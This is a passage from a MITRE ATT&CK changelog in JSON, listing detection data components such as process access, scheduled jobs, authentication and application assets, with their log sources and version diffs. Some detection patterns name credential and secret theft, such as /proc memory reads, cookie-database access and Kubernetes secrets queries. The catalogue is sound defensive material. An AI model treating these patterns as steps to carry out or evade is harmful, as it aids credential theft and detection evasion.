                    "description": "Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.\n\n*Data Collection Measures:*\n\n- Endpoint Detection and Response (EDR) Tools:\n    -  EDR solutions that provide telemetry on inter-process access and memory manipulation.\n- Sysmon (Windows):\n    - Event ID 10: Captures process access attempts, including:\n        - Source process (initiator)\n        - Target process (victim)\n        - Access rights requested\n        - Process ID correlation\n- Windows Event Logs:\n    - Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.\n    - Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.\n- Linux/macOS Monitoring:\n    - AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).\n    - eBPF/XDP: Used for low-level monitoring of kernel process access.\n    - OSQuery: Query process access behavior via structured SQL-like logging.\n- Procmon (Process Monitor) and Debugging Tools:\n    - Windows Procmon: Captures real-time process interactions.\n    - Linux strace / ptrace: Useful for tracking process behavior at the system call level.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=10"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process State"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace attach"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ptrace or task_for_pid"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_open"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "High frequency of accept(), read(), or SSL_read() syscalls tied to nginx/apache processes"
                        },
                        {
                            "name": "Apple TCC Logs",
                            "channel": "Microphone Access Events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "syscalls (open, read, ioctl) on /dev/input or /proc/*/fd/*"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=25"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected NSXPCConnection calls by non-Apple-signed or abnormal binaries"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unusual Mach port registration or access attempts between unrelated processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.security, library=libsystem_kernel.dylib"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace syscall or access to /proc/*/mem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "vm_read, task_for_pid, or file open to cookie databases"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ACCESS"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, fork, mmap, ptrace"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace or process_vm_readv"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "unexpected memory inspection"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
                        },
                        {
                            "name": "EDR:telemetry",
                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-09 17:05:23.355000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0001",
                            "external_id": "DC0001"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Scheduled Job Creation",
                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Scheduled Job",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4698"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of non-standard script or binary by cron"
                        },
                        {
                            "name": "WinEventLog:TaskScheduler",
                            "channel": "EventCode=106"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "crontab, systemd_timers"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd_jobs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Startup script and task execution logs"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "verb=create, resource=cronjobs, group=batch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: crontab edits, launch of cron job"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events - cron, launchd"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "execution of scheduled job"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "task creation events"
                        },
                        {
                            "name": "macos:cron",
                            "channel": "cron/launchd"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4699"
                        },
                        {
                            "name": "linux:cron",
                            "channel": "Scheduled execution of unknown or unusual script/binary"
                        },
                        {
                            "name": "MobiledEDR:telemetry",
                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-24 19:47:33.610000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0002",
                            "external_id": "DC0002"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "User Account Authentication",
                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:AUTH",
                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "pam_authenticate, sshd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
                        },
                        {
                            "name": "auditd:USER_LOGIN",
                            "channel": "USER_AUTH"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "sts:GetFederationToken"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRoleWithWebIdentity"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AWS IAM: ListUsers, ListRoles"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin or AssumeRole"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Success logs from high-risk accounts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Multiple MFA challenge requests without successful primary login"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Operation=UserLogin"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Unusual Token Usage or Application Consent"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Login from newly created account"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Interactive/Non-Interactive Sign-In"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Reset password or download key from portal"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "status = failure"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SigninSuccess"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Failure Reason + UserPrincipalName"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in activity"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "interactive shell or SSH access preceding storage enumeration"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "/var/log/auth.log"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "SSH session/login"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "user login from unexpected IP or non-admin user role"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "/var/log/vmware/vpxd.log"
                        },
                        {
                            "name": "ESXiLogs:authlog",
                            "channel": "Unexpected login followed by encoding commands"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "drive.activity"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "login.event"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "Token Generation via Domain Delegation"
                        },
                        {
                            "name": "GCPAuditLogs:login.googleapis.com",
                            "channel": "Failed sign-in events"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "authentication.k8s.io/v1beta1"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Failed login"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "authentication.k8s.io"
                        },
                        {
                            "name": "linux:auth",
                            "channel": "sshd login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo/date/timedatectl execution by non-standard users"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SSH failed login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Failed password for invalid user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd[pid]: Failed password"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "authentication and authorization events during environmental validation phase"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Logon failure"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "FailedLogin"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Sign-in from anomalous location or impossible travel condition"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "UserLoginSuccess"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Unusual sign-in from service principal to user mailbox"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Delegated permission grants without user login event"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "login using refresh_token with no preceding authentication context"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login success without MFA step"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "User credential prompt events without associated trusted installer package"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login failure / authorization denied"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "auth"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login Window and Authd errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authd"
                        },
                        {
                            "name": "network:auth",
                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config access, authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authorization/accounting logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive format command"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "admin login events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive command sequence"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA, RADIUS, or TACACS authentication"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA or TACACS authentication failures"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication & authorization"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "login failed"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Accepted password or publickey for user from remote IP"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Repeated failed authentication attempts or replay patterns"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Successful login without expected MFA challenge"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "sshd or PAM logins"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
                        },
                        {
                            "name": "Okta:authn",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "Okta:SystemLog",
                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
                        },
                        {
                            "name": "saas-app:auth",
                            "channel": "login_failure"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
                        },
                        {
                            "name": "saas:auth",
                            "channel": "signin_failed"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "API access without user login"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Accessed third-party credential management service"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "login with reused session token and mismatched user agent or IP"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to device management or enterprise mobility management consoles"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "session.impersonation.start"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "API login using access_token without login history"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "Login"
                        },
                        {
                            "name": "User Account",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4769, 1200, 1202"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4768, 4769, 4770"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4769"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4776, 4625"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625, 4771, 4648"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4648"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 19:59:14.491000+00:00",
                    "modified": "2026-01-16 16:18:01.897000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0112",
                            "external_id": "DC0112"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "API Calls",
                    "description": "API calls utilized by an application that could indicate malicious activity",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated sandbox or policy violations by a single process or app bundle (for example, deny rules) followed by successful access to resources or APIs that normally require higher privileges"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "mmap with PROT_EXEC and PROT_WRITE by sandboxed app"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-16 16:18:01.897000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0112\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0112\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated sandbox or policy violations by a single process or app bundle (for example, deny rules) followed by successful access to resources or APIs that normally require higher privileges\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"mmap with PROT_EXEC and PROT_WRITE by sandboxed app\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"android:logcat\", \"channel\": \"SELinux AVC related to execute_no_trans/execmem after decode/unpack activity by the same app UID\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-29 14:59:30.164000+00:00",
                    "modified": "2026-03-11 15:49:22.334000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0119",
                            "external_id": "DC0119"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application Assets",
                    "description": "Application Assets represent static or packaged resources bundled with an application that may contain executable logic, configuration data, or hidden payloads.\n\nThese assets may include embedded binaries, scripts, configuration files, libraries, or other resources stored within the application package. Adversaries may hide malicious components within application assets to evade detection during installation or initial inspection.\n\nExamples\n\nAndroid:\n\n- Embedded .dex files loaded dynamically\n- Hidden native libraries in APK assets\n- Dropped payloads stored within the app sandbox\n\niOS:\n\n- Embedded frameworks\n- Configuration files within the application bundle\n- Hidden scripts or secondary binaries packaged with the app\n\nCollection Methods\n- Mobile EDR application inspection\n- Static application analysis\n- Application package scanning during install or sideload events\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Application gaining or using unexpected background execution entitlements or modes"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-11 15:49:22.334000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0119\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0119\"}, \"root['description']\": {\"new_value\": \"Application Assets represent static or packaged resources bundled with an application that may contain executable logic, configuration data, or hidden payloads.\\n\\nThese assets may include embedded binaries, scripts, configuration files, libraries, or other resources stored within the application package. Adversaries may hide malicious components within application assets to evade detection during installation or initial inspection.\\n\\nExamples\\n\\nAndroid:\\n\\n- Embedded .dex files loaded dynamically\\n- Hidden native libraries in APK assets\\n- Dropped payloads stored within the app sandbox\\n\\niOS:\\n\\n- Embedded frameworks\\n- Configuration files within the application bundle\\n- Hidden scripts or secondary binaries packaged with the app\\n\\nCollection Methods\\n- Mobile EDR application inspection\\n- Static application analysis\\n- Application package scanning during install or sideload events\\n\", \"old_value\": \"Additional assets included with an application\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,22 @@\\n-Additional assets included with an application\\n+Application Assets represent static or packaged resources bundled with an application that may contain executable logic, configuration data, or hidden payloads.\\n+\\n+These assets may include embedded binaries, scripts, configuration files, libraries, or other resources stored within the application package. Adversaries may hide malicious components within application assets to evade detection during installation or initial inspection.\\n+\\n+Examples\\n+\\n+Android:\\n+\\n+- Embedded .dex files loaded dynamically\\n+- Hidden native libraries in APK assets\\n+- Dropped payloads stored within the app sandbox\\n+\\n+iOS:\\n+\\n+- Embedded frameworks\\n+- Configuration files within the application bundle\\n+- Hidden scripts or secondary binaries packaged with the app\\n+\\n+Collection Methods\\n+- Mobile EDR application inspection\\n+- Static application analysis\\n+- Application package scanning during install or sideload events\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application gaining or using unexpected background execution entitlements or modes\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to66__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to66__0\"><a href=\"#difflib_chg_to66__top\">t</a></td><td class=\"diff_header\" id=\"from66_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Additional&nbsp;assets&nbsp;included&nbsp;with&nbsp;an&nbsp;application</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to66__top\">t</a></td><td class=\"diff_header\" id=\"to66_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Application&nbsp;Assets&nbsp;represent&nbsp;static&nbsp;or&nbsp;packaged&nbsp;resources&nbsp;bu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ndled&nbsp;with&nbsp;an&nbsp;application&nbsp;that&nbsp;may&nbsp;contain&nbsp;executable&nbsp;logic,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;configuration&nbsp;data,&nbsp;or&nbsp;hidden&nbsp;payloads.&nbsp;&nbsp;These&nbsp;assets&nbsp;may&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nclude&nbsp;embedded&nbsp;binaries,&nbsp;scripts,&nbsp;configuration&nbsp;files,&nbsp;libr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aries,&nbsp;or&nbsp;other&nbsp;resources&nbsp;stored&nbsp;within&nbsp;the&nbsp;application&nbsp;pack</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">age.&nbsp;Adversaries&nbsp;may&nbsp;hide&nbsp;malicious&nbsp;components&nbsp;within&nbsp;applic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;assets&nbsp;to&nbsp;evade&nbsp;detection&nbsp;during&nbsp;installation&nbsp;or&nbsp;initi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">al&nbsp;inspection.&nbsp;&nbsp;Examples&nbsp;&nbsp;Android:&nbsp;&nbsp;-&nbsp;Embedded&nbsp;.dex&nbsp;files&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td 